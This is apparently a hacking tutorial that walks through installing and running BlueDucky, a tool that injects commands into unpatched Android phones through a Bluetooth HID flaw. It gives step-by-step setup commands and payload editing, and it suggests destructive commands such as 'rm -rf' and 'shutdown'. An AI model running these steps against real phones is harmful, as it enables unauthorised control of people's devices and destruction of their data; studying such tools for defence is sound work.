Bluetooth is a nearly ubiquitous protocol used to communicate between devices in close proximity or a piconet, such as speakers, headphones, and cellphones. If an attacker can exploit Bluetooth, it may be able to take control of or eavesdrop on any of these devices.
There are numerous classes of Bluetooth devices. These different classes are announced to the connecting device in the banner. In previous Bluetooth tutorials here, we have discussed probably the most important class for exploiting Bluetooth devices, the HID class. This class of devices is known as Human Interface Devices and includes such things as Bluetooth mice and keyboards. These are the devices that are allowed to send inputs to the Bluetooth-enabled device necessary for keyboards and mice to function properly.
In 2023, a new vulnerability was discovered in Bluetooth that may allow an unauthenticated HID Device to initiate and establish an encrypted connection. If this happens, the HID device may be able to inject commands into the device. This exploit works against unpatched Android 11 and later devices and any Android 10 and earlier device, as there is no patch presently available for these devices. A Proof Of Concept or POC was released in January 2024 and was recently integrated into a new tool known as BlueDucky.
Let’s take a look at this tool and see what it can do.
Step # 1 Download and Install BlueDucky
To install BlueDucky, we need to do a few things to get our system ready.
First, update your apt cache.
kali > sudo apt update
Next, install the necessary dependencies from the Kali repository.
kali > sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev git gcc python3-pip python3-setuptools python3-pydbus
We n0w need to get bluez from github.com. If you have done my previous tutorials on bluetooth, you likely already have this.
kali > git clone https://github.com/pybluez/pybluez.git
Now, move into the new directory, pybluez.
kali > cd pybluez
We now need to run the setup script for bluez
kali > python3 setup.py install
Next, we need to build bdaddr from source. bdaddr enables us to query or set the local Bluetooth device address.
kali > cd ~
kali > git clone –depth=1 https://github.com/bluez/bluez.git
kali > gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
Now, let copy bdaddr to our local binary directory (/usr/local/bin) so that we can use it in our script from anywhere (/usr/local/bin is in the Linux $PATH variable).
kali > sudo cp bdaddr /usr/local/bin
Finally, we should download BlueDucky from github.
kali > git clone https://github.com/pentestfunctions/BlueDucky.git
kali > cd BlueDucky
kali > sudo hciconfig hci0 up
Step # 2 Run BlueDucky
Now that we have all of the elements necessary to run BlueDucky installed, let’s try running it. If you are running it from a system with an external plug-in bluetooth adapter, as I am, you will likely need to make a small change to the python script. BlueDucky, by default, uses hci0 to scan for Bluetooth devices. If you added an external bluetooth device, it will likely be recognized as hci1. We can remedy this by simply opening the script in your favorite text editor and changing the default value to hci1. Here I have used the default GUI text editor in Kali, mousepad.
kali > sudo mousepad BlueDucky.py
Now, go ahead and save this file. Make certain to give yourself execute permissions.
kali > sudo chmod 755 BlueDucky.py
It’s a good idea now to check to make certain your bluetooth adapter is up and activated.
kali > hciconfig hci1 up
If your adapter is up and running, it’s time to start BlueDucky!
kali > sudo python3 BlueDucky.py
If you know the MAC address of the device, you can enter it here. If not, simply hit ENTER and BlueDucky will scan for available MAC addresses.
At this point, you can enter “yes”and then the number of the device. I selected “4”, the Samsung Galaxy Note10+.
You will then be asked which payload you would like to use. There are two payloads available by default (you can build you own and place it in the payloads directory).
I’ve opened payload_example_1.txt in my text editor and edited line 13 to open the dadynews.com website on the target phone.
When I hit ENTER, BlueDucky connects to the target Android phone and opens the website as seen below!
Of course, you can send ANY arbitrary commands or website by simply editing the payloads files.
Summary
Bluetooth enabled devices are all around us in our everyday life. These includes phones, tablets, speakers, headsets, keyboards and many other devices. Bluetooth devices declare the type of the device they are before pairing with another device. This is the class of the device. This class declaration can be manipulated by an attacker to inject commands into the device.
BlueDucky is an automated tool for exploiting this vulnerability and although the tool only sends an innocuous message to the target, it can easily be altered to send malicious commands into the target device such as “shutdown” or “rm -rf”.